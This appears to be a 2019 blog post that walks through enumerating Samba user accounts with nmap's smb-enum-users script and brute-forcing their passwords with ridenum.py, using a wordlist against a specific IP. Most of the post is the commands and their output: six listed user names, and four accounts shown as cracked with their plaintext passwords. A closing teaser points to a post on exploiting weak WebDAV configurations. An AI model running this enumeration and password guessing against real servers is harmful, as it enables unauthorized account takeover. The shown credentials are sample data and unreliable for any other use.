Friday, October 4, 2019

Brute Force Samba User Accounts with ridenum.py

Finding Samba users with NMAP

We can use nmap to enumerate samba user names on the remote host by using the nmap script 'smb-enum-users'.

root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.0027s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-enum-users: 
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description: 
|     Flags:       Normal user account
|   ASUS\hayden (RID: 1002)
|     Full name:   hayden sutton
|     Description: 
|     Flags:       Normal user account
|   ASUS\jared (RID: 1003)
|     Full name:   jared beck
|     Description: 
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description: 
|     Flags:       Normal user account
|   ASUS\sasha (RID: 1004)
|     Full name:   sasha kim
|     Description: 
|     Flags:       Normal user account
|   ASUS\vance (RID: 1005)
|     Full name:   vance perkins
|     Description: 
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
root@asus:~/unix%

Once we have our list of users on the Samba server we can move on to enumerating and brute forcing accounts. Our user list should look like so.

ASUS\clare
ASUS\sam
ASUS\sasha
ASUS\vance
ASUS\jared
ASUS\hayden

Using ridenum.py to brute force Samba user accounts

Rid Enum is a RID cycling attack that attempts to enumerate user accounts through null sessions and the SID to RID enum.

root@asus:~/src/ridenum% ./ridenum.py 48.21.33.124 500 50000 /home/sam/rock.txt /home/sam/samba.txt
[*] Successfully guessed username: ASUS\sasha with password of: master
[*] Successfully guessed username: ASUS\vance with password of: sonics
[*] Successfully guessed username: ASUS\jared with password of: attlabs
[*] Successfully guessed username: ASUS\hayden with password of: manager
[*] We got some accounts, exported results to 48.21.33.124_success_results_txt
[*] All accounts extracted via RID cycling have been exported to 48.21.33.124_users.txt
root@asus:~/src/ridenum% 

No comments:

Post a Comment

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...